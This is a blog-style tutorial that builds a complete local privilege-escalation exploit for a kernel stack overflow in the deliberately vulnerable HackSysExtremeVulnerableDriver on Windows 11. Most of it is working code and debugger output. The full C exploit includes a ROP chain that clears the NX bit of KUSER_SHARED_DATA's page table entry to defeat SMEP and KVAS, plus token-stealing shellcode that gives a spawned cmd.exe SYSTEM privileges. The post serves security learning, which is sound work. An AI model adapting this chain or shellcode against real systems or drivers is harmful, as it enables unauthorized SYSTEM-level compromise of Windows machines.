Windows Kernel Driver Exploitation - 1

2022-04-25

Exploiting a kernel stack overflow in Windows 11?

Environment Setup

OS: Windows 11 22000.556 VM
HackSysExtremeVulnerableDriver 3.0

Articles on setting up remote kernel debugging and loading the driver can be easily found online, so I’ll skip that part and focus on the technical details.

Introduction

Since the driver is intentionally vulnerable, almost no reverse engineering is needed to locate the bug, so I'll skip that part as well.

Essentially, there is a kernel stack-based buffer overflow: the saved return address sits at offset 2072 of the buffer we send with IOCTL code 0x222003, which gives us control of RIP.

First 0x4141414141414141

We’ll start by writing a base program that triggers the vulnerability and takes control of RIP.

#include <stdio.h>
#include <malloc.h>
#include <Windows.h>

#define STACK_OVERFLOW_IOCTL        0x222003
#define PAD_SZ                      2072
#define PAYLOAD_SZ(x)               (sizeof(UINT64) * x)

#define log_warn(x) (printf("[-] Err: %s\n", x))

int main(void)
{
    char        *buf = NULL;
    HANDLE      device = INVALID_HANDLE_VALUE;
    int         c = 0;

    buf = (char *)malloc(PAD_SZ * 2);
    if (!buf) {
        log_warn("malloc");
        goto out;
    }

    memset(buf, 'A', PAD_SZ);
    ((UINT64 *)(buf + PAD_SZ))[c++] = 0x4141414141414141;

    device = CreateFileW(L"\\\\.\\HackSysExtremeVulnerableDriver", GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (device == INVALID_HANDLE_VALUE) {
        log_warn("createfile");
        goto out;
    }

    DeviceIoControl(device, STACK_OVERFLOW_IOCTL, buf, PAD_SZ + PAYLOAD_SZ(c), NULL, 0, NULL, NULL);
    
out:
    if (device != INVALID_HANDLE_VALUE) {
        CloseHandle(device);
        device = INVALID_HANDLE_VALUE;
    }

    if (buf) {
        free(buf);
        buf = NULL;
    }

    return 0;
}

Access violation - code c0000005 (!!! second chance !!!)
fffff806`483566bf c3              ret
1: kd> dq rsp L1
ffff8280`04d8e778  41414141`41414141
1: kd> u rip L1
fffff806`483566bf c3              ret

Running the PoC crashes on the ret instruction with 0x4141414141414141 at the top of the stack, which confirms that we control RIP reliably.

Theory

From here we have a few options.
We can either attempt to gain shellcode execution, or try to achieve our goals with pure ROP (a data-only attack).

Since a vanilla stack overflow is a rather powerful primitive, I’m more interested in finding out whether full shellcode execution is possible.

However, the year is 2022 and we are on Windows 11. Even the default installation has plenty of mitigations enabled (SMEP, KASLR, KVAS, etc.). We have to bypass them to get a chance to execute code.

SMEP

Supervisor Mode Execution Prevention is enabled by setting bit 20 (counting from zero) of the CR4 register, as shown below.

0: kd> r cr4
cr4=00000000003506f8
0: kd> .formats cr4
Evaluate expression:
  Hex:     00000000`003506f8
  Decimal: 3475192
  Octal:   0000000000000015203370
  Binary:  00000000 00000000 00000000 00000000 00000000 00110101 00000110 11111000

This means any attempt to execute user mode memory while in kernel mode will raise an exception and eventually cause a BSOD.
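
To make the bit position concrete, here is a minimal sketch that tests bit 20 of a CR4 value such as the one WinDbg printed above. The helper name cr4_smep_enabled is made up for illustration; it only inspects a number and does not read the real register.

```c
#include <stdbool.h>
#include <stdint.h>

#define CR4_SMEP_BIT 20   /* CR4.SMEP, counting from bit 0 */

/* Hypothetical helper: report whether the SMEP bit is set in a CR4 value. */
bool cr4_smep_enabled(uint64_t cr4)
{
    return ((cr4 >> CR4_SMEP_BIT) & 1u) != 0;
}
```

Feeding it the value from the debugger session, cr4_smep_enabled(0x3506f8), returns true, since 0x3506f8 has 0x100000 set.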

KASLR

Addresses of ntoskrnl.exe exports and other data structures are randomized on boot. This is pretty useless from an LPE standpoint, since any medium-integrity process can query the system to view export addresses.

KVAS

Kernel Virtual Address Shadow is Windows’ implementation of KPTI. As a side effect it acts as a software-based SMEP: user pages are marked NX in the kernel's view of the address space, regardless of the bits in CR4.

With these in mind, we can start thinking of the bypasses.

Bypassing KASLR is simple. We use documented API EnumDeviceDrivers to get the base address of nt. From there we can calculate the addresses of symbols at runtime.
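
The runtime calculation is just base plus offset. A minimal sketch, where resolve is a hypothetical helper and the numbers are taken from the debugger sessions in this post (nt loaded at fffff806`41800000, nt!MiGetPteAddress+0x13 at offset 0x29dc23). Offsets like this are specific to one kernel build and have to be looked up again for any other.

```c
#include <stdint.h>

/* Hypothetical helper: turn an offset from the image base into a runtime address. */
uint64_t resolve(uint64_t image_base, uint64_t offset)
{
    return image_base + offset;
}
```

With those values, resolve(0xfffff80641800000, 0x29dc23) yields 0xfffff80641a9dc23, the same address WinDbg reports for nt!MiGetPteAddress+0x13.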

SMEP however is more difficult to deal with. For starters, we can’t just use ROP to modify CR4, because software based SMEP does not care about that.

Instead, we will have to turn our stack overflow into an arbitrary write primitive, and corrupt some important structures.

PTE

The Page Table Entry (PTE) is part of the paging structures used by Windows. More details can be found online easily. The important part is that the PTE indicates whether a page is executable or not.

It is of type _MMPTE_HARDWARE:

0: kd> !pte 0xFFFFF78000000000
                                           VA fffff78000000000
PXE at FFFF974BA5D2EF78    PPE at FFFF974BA5DEF000    PDE at FFFF974BBDE00000    PTE at FFFF977BC0000000
contains 0000000004E02063  contains 0000000004E03063  contains 0000000004E04063  contains 8000000004331963
pfn 4e02      ---DA--KWEV  pfn 4e03      ---DA--KWEV  pfn 4e04      ---DA--KWEV  pfn 4331      -G-DA--KW-V

0: kd> dt _MMPTE_HARDWARE FFFF977BC0000000
nt!_MMPTE_HARDWARE
   +0x000 Valid            : 0y1
   +0x000 Dirty1           : 0y1
   +0x000 Owner            : 0y0
   +0x000 WriteThrough     : 0y0
   +0x000 CacheDisable     : 0y0
   +0x000 Accessed         : 0y1
   +0x000 Dirty            : 0y1
   +0x000 LargePage        : 0y0
   +0x000 Global           : 0y1
   +0x000 CopyOnWrite      : 0y0
   +0x000 Unused           : 0y0
   +0x000 Write            : 0y1
   +0x000 PageFrameNumber  : 0y0000000000000000000000000100001100110001 (0x4331)
   +0x000 ReservedForSoftware : 0y0000
   +0x000 WsleAge          : 0y0000
   +0x000 WsleProtection   : 0y000
   +0x000 NoExecute        : 0y1
0: kd> .formats poi(FFFF977BC0000000)
Evaluate expression:
  Hex:     80000000`04331963
  Decimal: -9223372036784318109
  Octal:   1000000000000414614543
  Binary:  10000000 00000000 00000000 00000000 00000100 00110011 00011001 01100011
  Chars:   .....3.c
  Time:    ***** Invalid FILETIME
  Float:   low 2.1053e-036 high -0
  Double:  -3.48107e-316

As shown above, we inspect the PTE of KUSER_SHARED_DATA, a static section.
This is a writable page in kernel space, always mapped at the same address, 0xFFFFF78000000000.

The NX bit is the highest bit (bit 63). This means that if we clear the most significant byte of KUSER_SHARED_DATA's PTE, the page becomes executable.

0: kd> ? 0y0000000000000000000000000000000000000100001100110001100101100011
Evaluate expression: 70457699 = 00000000`04331963
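
The same arithmetic as a minimal C sketch. Both helper names are made up for illustration. The first clears only bit 63; the second zeroes the whole top byte, which is what a single-byte write at PTE+7 does. For the PTE value dumped above the two give the same result, because the other fields in that byte (WsleAge and WsleProtection) are already zero.

```c
#include <stdint.h>

#define PTE_NX_BIT 63   /* NoExecute is the highest bit of the entry */

/* Hypothetical helper: clear only the NoExecute bit. */
uint64_t pte_clear_nx(uint64_t pte)
{
    return pte & ~(1ULL << PTE_NX_BIT);
}

/* Hypothetical helper: zero byte 7 (bits 56..63), like a one-byte write of 0. */
uint64_t pte_zero_top_byte(uint64_t pte)
{
    return pte & 0x00FFFFFFFFFFFFFFULL;
}
```

Applied to 0x8000000004331963, both return 0x0000000004331963, matching the WinDbg evaluation.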

Since the actual important data is only around the first 0x700 bytes of KUSER_SHARED_DATA while pages are 0x1000 bytes, we are free to write anything at around KUSER_SHARED_DATA+0x800.

Now we have a general plan.

Use ROP to disable NX
Copy shellcode to KUSER_SHARED_DATA+0x800
Jump to shellcode

Gadget hunting

As far as I know, there are two easy ways to find gadgets in kernel land.

Use a tool like rp++ against C:\Windows\System32\ntoskrnl.exe
Use WinDbg’s search function.

For short gadgets (one instruction before ret), I usually do it in WinDbg directly.

For example, if I’m looking for a pop r14; pop r15; ret; gadget, I’ll do as shown below:

0: kd> lm m nt
Browse full module list
start             end                 module name
fffff806`41800000 fffff806`42847000   nt         (pdb symbols)          C:\ProgramData\dbg\sym\ntkrnlmp.pdb\DCC3FFCBE9C59B5668C1DE2BD6CBC6DF1\ntkrnlmp.pdb
0: kd> s -b fffff806`41800000 fffff806`42847000 41 5e 41 5f c3
fffff806`41c1eaea  41 5e 41 5f c3 cc cc cc-cc cc cc cc 66 66 0f 1f  A^A_........ff..
fffff806`424e2880  41 5e 41 5f c3 00 00 00-78 33 d1 22 85 d1 ff ff  A^A_....x3."....
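
For reference, the byte search that s -b performs can be sketched in a few lines of C. This is only an illustration of the idea, run against an in-memory buffer; find_bytes is a hypothetical helper, not something from WinDbg or rp++. A byte match alone does not prove the bytes live in an executable section, so each hit still needs to be checked.

```c
#include <stddef.h>
#include <string.h>

/*
 * Hypothetical helper: return the offset of the first occurrence of `pat`
 * in `hay` at or after `start`, or (size_t)-1 if there is none.
 */
size_t find_bytes(const unsigned char *hay, size_t hay_len,
                  const unsigned char *pat, size_t pat_len, size_t start)
{
    if (pat_len == 0 || pat_len > hay_len)
        return (size_t)-1;

    for (size_t i = start; i + pat_len <= hay_len; i++) {
        if (memcmp(hay + i, pat, pat_len) == 0)
            return i;
    }
    return (size_t)-1;
}
```

Searching for the bytes 41 5e 41 5f c3 (pop r14; pop r15; ret) and then calling the function again with start set to the previous hit plus one walks through every candidate, the same way the debugger lists them.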

The arbitrary write gadgets I’ll use revolve around RAX and RCX, since gadgets using these registers are the easiest to find.

Of course we need:

pop rax; ret;
pop rcx; ret;

Next I used:
mov qword ptr [rax], rcx; ret;

for arbitrary write.

Finally:
add rax, qword ptr [rcx]; ret;
mov byte ptr [rax], cl; ret;

to manipulate the PTE. We’ll see how it’s done shortly.

PTE Manipulation

Before we can clear the most significant byte of KUSER_SHARED_DATA’s PTE, we have to locate it in memory.

The kernel has an internal routine that does exactly that, nt!MiGetPteAddress:

0: kd> u nt!MiGetPteAddress
nt!MiGetPteAddress:
fffff806`41a9dc10 48c1e909        shr     rcx,9
fffff806`41a9dc14 48b8f8ffffff7f000000 mov rax,7FFFFFFFF8h
fffff806`41a9dc1e 4823c8          and     rcx,rax
fffff806`41a9dc21 48b8000000000097ffff mov rax,0FFFF970000000000h
fffff806`41a9dc2b 4803c1          add     rax,rcx
fffff806`41a9dc2e c3              ret

As per the x64 calling convention, RCX holds the first argument passed to this function, which is the virtual address whose PTE we want.

So if we want to find the PTE of address X, we do ( (X >> 9) & 0x7ffffffff8 ) + PTE_BASE
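
The formula can be checked against the !pte output from earlier. A minimal sketch, with hypothetical helper names, using the PTE_BASE value from this boot (0xFFFF970000000000); the base changes on every boot.

```c
#include <stdint.h>

/* Hypothetical helper: the part of the formula that does not depend on PTE_BASE. */
uint64_t pte_offset(uint64_t va)
{
    return (va >> 9) & 0x7FFFFFFFF8ULL;
}

/* Hypothetical helper: mirrors the arithmetic of nt!MiGetPteAddress. */
uint64_t pte_address(uint64_t va, uint64_t pte_base)
{
    return pte_offset(va) + pte_base;
}
```

For KUSER_SHARED_DATA, pte_address(0xFFFFF78000000000, 0xFFFF970000000000) gives 0xFFFF977BC0000000, the same PTE address that !pte printed. Adding 7 to that result points at the most significant byte of the entry.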

PTE_BASE is affected by KASLR, but we can dynamically locate it at nt!MiGetPteAddress+0x13

0: kd> dq nt!MiGetPteAddress+0x13 L1
fffff806`41a9dc23  ffff9700`00000000

Hence, we first feed the (X >> 9) & 0x7ffffffff8 part into RAX, and point RCX to nt!MiGetPteAddress+0x13

Then we can use the add rax, qword ptr [rcx] gadget to compute the PTE address, before using the byte-write gadget to clear the most significant byte.

The code will look like this:

#define OFF_POP_RCX                 0x4126a0            // nt!HvlEndSystemInterrupt+0x20
#define OFF_POP_RAX                 0x92dbbd            // nt!FsRtlNotifyFilterReportChangeLite+0x4d
#define OFF_MOV_DEREF_RAX_RCX       0x2efac4            // nt!KiMoveApcState+0x74
#define OFF_ADD_RAX_DEREF_RCX       0xbc08cb            // unknown name
#define OFF_MOV_BYTE_DEREF_RAX_CL   0x576bc0            // nt!KiGetPastDueIRTimerInfo+0x40

#define WRITE_MEM                   0xFFFFF78000000800  // KUSER_SHARED_DATA+0x800
#define OFF_PTE_BASE                0x29dc23            // nt!MiGetPteAddress+0x13

((UINT64 *)(buf + PAD_SZ))[c++] = (UINT64)nt + OFF_POP_RAX;
((UINT64 *)(buf + PAD_SZ))[c++] = ((WRITE_MEM >> 9) & 0x7ffffffff8) + 7; // +7 to get to most significant byte
((UINT64 *)(buf + PAD_SZ))[c++] = (UINT64)nt + OFF_POP_RCX;
((UINT64 *)(buf + PAD_SZ))[c++] = (UINT64)nt + OFF_PTE_BASE;
((UINT64 *)(buf + PAD_SZ))[c++] = (UINT64)nt + OFF_ADD_RAX_DEREF_RCX;
((UINT64 *)(buf + PAD_SZ))[c++] = (UINT64)nt + OFF_POP_RCX;
((UINT64 *)(buf + PAD_SZ))[c++] = 0;
((UINT64 *)(buf + PAD_SZ))[c++] = (UINT64)nt + OFF_MOV_BYTE_DEREF_RAX_CL;

Shellcoding

Kernel shellcode is rather simple and does not require us to resolve any addresses.

Extensive documentation can be found online, so I’ll just talk about the parts I modified.

// rax contains pid of spawned cmd

    mov    r12, QWORD PTR gs:0x188
    mov    r12, QWORD PTR [r12+0xb8]
    mov    rbx, r12

    loop1:
    mov    rbx,QWORD PTR [rbx+0x448]
    sub    rbx,0x448
    mov    rcx,QWORD PTR [rbx+0x440]
    cmp    rcx,0x4
    jne    loop1

    loop2:
    mov r12, qword ptr [r12+0x448]
    sub r12, 0x448
    mov rcx, qword ptr [r12+0x440]
    cmp rcx, rax
    jne loop2

    mov    rcx,QWORD PTR [rbx+0x4b8]
    mov    QWORD PTR [r12+0x4b8],rcx
    jmp    $

Firstly, the offsets of ActiveProcessLinks and Token changed from Windows 10 to Windows 11, so it’s important to look them up with WinDbg.

At the end of the shellcode, I inserted an infinite loop, because I found proper kernel recovery extremely difficult. I could have used nt!KiDelayExecutionThread as a cleaner way to suspend the thread, but that led to a crash very quickly, possibly due to resource locking.

Since the current thread will be spinning forever, I can’t just copy the privileged token to the current process. Instead I’ll pass the PID of a new process in RAX, and relay the token to it.

Some people prefer to clear the refcount of the token, but I found it to be pointless for two reasons. First, the refcount is not strictly controlled, as inferred from ReactOS’s source code (if refcount == 1, it is brought back to the maximum again). Second, it is only a fast refcount: even if it runs out, a slow path is taken and things still work just fine.

To convert the assembly to shellcode, I simply used an online assembler and Python.

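def make(s):
    # Pack raw shellcode bytes into little-endian 64-bit words, printed as hex.
    c = 0
    out = ""
    for i in s:
        c += 1
        # Prepend each byte so the first byte ends up least significant.
        out = hex(ord(i))[2:].rjust(2, "0") + out
        if c == 8:
            print("0x" + out)
            c = 0
            out = ""
    if out:  # trailing partial word; nothing left if the length is a multiple of 8
        print("0x" + out)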

make("\x65\x4C\x8B....snippet....)
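
The same packing can be sketched in C, which is handy for checking that the words in the final exploit really correspond to the assembled bytes. pack_qwords is a hypothetical helper written for this illustration; unlike the Python version it zero-pads a trailing partial word instead of printing a shorter number, which gives the same value.

```c
#include <stddef.h>
#include <stdint.h>

/*
 * Hypothetical helper: pack `len` bytes into little-endian 64-bit words.
 * Returns the number of words written, or 0 if `out` is too small.
 */
size_t pack_qwords(const uint8_t *bytes, size_t len, uint64_t *out, size_t out_cap)
{
    size_t words = (len + 7) / 8;

    if (words > out_cap)
        return 0;

    for (size_t i = 0; i < words; i++)
        out[i] = 0;

    /* Byte i lands in word i / 8, shifted up by 8 bits per position. */
    for (size_t i = 0; i < len; i++)
        out[i / 8] |= (uint64_t)bytes[i] << (8 * (i % 8));

    return words;
}
```

For example, the eight bytes 65 4c 8b 24 25 88 01 00 pack into 0x00018825248b4c65, the first entry of the shellcode array in the final exploit.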

Final Exploit

#include <stdio.h>
#include <malloc.h>
#include <Windows.h>
#include <Psapi.h>

#define STACK_OVERFLOW_IOCTL        0x222003
#define PAD_SZ                      2072
#define PAYLOAD_SZ(x)               (sizeof(UINT64) * x)

#define OFF_POP_RCX                 0x4126a0            // nt!HvlEndSystemInterrupt+0x20
#define OFF_POP_RAX                 0x92dbbd            // nt!FsRtlNotifyFilterReportChangeLite+0x4d
#define OFF_MOV_DEREF_RAX_RCX       0x2efac4            // nt!KiMoveApcState+0x74
#define OFF_ADD_RAX_DEREF_RCX       0xbc08cb            // unknown name
#define OFF_MOV_BYTE_DEREF_RAX_CL   0x576bc0            // nt!KiGetPastDueIRTimerInfo+0x40

#define WRITE_MEM                   0xFFFFF78000000800  // KUSER_SHARED_DATA+0x800
#define OFF_PTE_BASE                0x29dc23            // nt!MiGetPteAddress+0x13

#define log_warn(x) (printf("[-] Err: %s\n", x))

void make_payload(_Inout_ char *buf, _Inout_ int *c, _In_ LPVOID nt, _In_ UINT64 *shellcode, _In_ size_t len);

int main(void)
{
    char        *buf = NULL;
    HANDLE      device = INVALID_HANDLE_VALUE;
    LPVOID      addr[8] = { 0 };
    DWORD       needed;
    LPVOID      nt;
    int         c = 0;

    /* 
    * 
    * rax contains pid of spawned cmd
    * 
        mov    r12, QWORD PTR gs:0x188
        mov    r12, QWORD PTR [r12+0xb8]
        mov    rbx, r12

        loop1:
        mov    rbx,QWORD PTR [rbx+0x448]
        sub    rbx,0x448
        mov    rcx,QWORD PTR [rbx+0x440]
        cmp    rcx,0x4
        jne    loop1

        loop2:
        mov r12, qword ptr [r12+0x448]
        sub r12, 0x448
        mov rcx, qword ptr [r12+0x440]
        cmp rcx, rax
        jne loop2

        mov    rcx,QWORD PTR [rbx+0x4b8]
        mov    QWORD PTR [r12+0x4b8],rcx
        jmp    $
    */

    UINT64      shellcode[] = {
        0x00018825248b4c65,
        0x0000b824a48b4d00,
        0x489b8b48e3894c00,
        0x0448eb8148000004,
        0x0004408b8b480000,
        0x4de57504f9834800,
        0x490000044824a48b,
        0x8b4900000448ec81,
        0x394800000440248c,
        0x04b88b8b48e475c1,
        0x04b8248c89490000,
        0xfeeb0000
    };
    PROCESS_INFORMATION pi = { 0 };
    STARTUPINFOA si = { sizeof(si) };   // cb (first member) must hold the structure size

    puts("[+] Exploit start");
    
    puts("[+] Getting nt base address");
    
    EnumDeviceDrivers(addr, sizeof(addr), &needed);
    if (!addr[0]) {
        log_warn("EnumDeviceDrivers");
        goto out;
    }

    nt = addr[0];
    printf("[+] nt base address: %p\n", nt);

    buf = (char *)malloc(PAD_SZ * 2);
    if (!buf) {
        log_warn("malloc");
        goto out;
    }

    char cmd[200] = { 0 };
    snprintf(cmd, sizeof(cmd), "C:\\Windows\\system32\\cmd.exe");

    BOOL status = CreateProcessA(NULL, cmd, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi);
    if (!status) {
        log_warn("createprocess");
        printf("[-] GetLastError: %lu\n", GetLastError());
        goto out;
    }

    DWORD pid = GetProcessId(pi.hProcess);
    printf("[+] cmd.exe process id: %lu\n", pid);

    memset(buf, 'A', PAD_SZ);
    ((UINT64 *)(buf + PAD_SZ))[c++] = (UINT64)nt + OFF_POP_RAX;
    ((UINT64 *)(buf + PAD_SZ))[c++] = ((WRITE_MEM >> 9) & 0x7ffffffff8) + 7; // +7 to get to most significant byte
    ((UINT64 *)(buf + PAD_SZ))[c++] = (UINT64)nt + OFF_POP_RCX;
    ((UINT64 *)(buf + PAD_SZ))[c++] = (UINT64)nt + OFF_PTE_BASE;
    ((UINT64 *)(buf + PAD_SZ))[c++] = (UINT64)nt + OFF_ADD_RAX_DEREF_RCX;
    ((UINT64 *)(buf + PAD_SZ))[c++] = (UINT64)nt + OFF_POP_RCX;
    ((UINT64 *)(buf + PAD_SZ))[c++] = 0;
    ((UINT64 *)(buf + PAD_SZ))[c++] = (UINT64)nt + OFF_MOV_BYTE_DEREF_RAX_CL;
    make_payload(buf, &c, nt, shellcode, sizeof(shellcode) / sizeof(UINT64));
    ((UINT64 *)(buf + PAD_SZ))[c++] = (UINT64)nt + OFF_POP_RAX;
    ((UINT64 *)(buf + PAD_SZ))[c++] = (UINT64)pid;
    ((UINT64 *)(buf + PAD_SZ))[c++] = WRITE_MEM; // shellcode
    
    device = CreateFileW(L"\\\\.\\HackSysExtremeVulnerableDriver", GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (device == INVALID_HANDLE_VALUE) {
        log_warn("createfile");
        goto out;
    }

    DeviceIoControl(device, STACK_OVERFLOW_IOCTL, buf, PAD_SZ + PAYLOAD_SZ(c), NULL, 0, NULL, NULL);
    
out:
    if (device != INVALID_HANDLE_VALUE) {
        CloseHandle(device);
        device = INVALID_HANDLE_VALUE;
    }

    if (buf) {
        free(buf);
        buf = NULL;
    }

    return 0;
}

void make_payload(_Inout_ char *buf, _Inout_ int *c, _In_ LPVOID nt, _In_ UINT64 *shellcode, _In_ size_t len)
{
    for (size_t i = 0; i < len; i++) {
        ((UINT64 *)(buf + PAD_SZ))[(*c)++] = (UINT64)nt + OFF_POP_RAX;
        ((UINT64 *)(buf + PAD_SZ))[(*c)++] = WRITE_MEM + i * sizeof(UINT64);
        ((UINT64 *)(buf + PAD_SZ))[(*c)++] = (UINT64)nt + OFF_POP_RCX;
        ((UINT64 *)(buf + PAD_SZ))[(*c)++] = shellcode[i];
        ((UINT64 *)(buf + PAD_SZ))[(*c)++] = (UINT64)nt + OFF_MOV_DEREF_RAX_RCX;
    }
}

system!

Conclusion

It feels amazing to finally do some research on the Windows kernel, a dream target of mine to hack. However, I do need to learn how to perform proper kernel recovery, because leaving the thread spinning wastes a lot of CPU and might cause system instability. I recently bought the Windows Kernel Programming 2nd Edition book, and hopefully I’ll learn more about Windows Internals. Looking forward to many more blog posts on the Windows kernel :)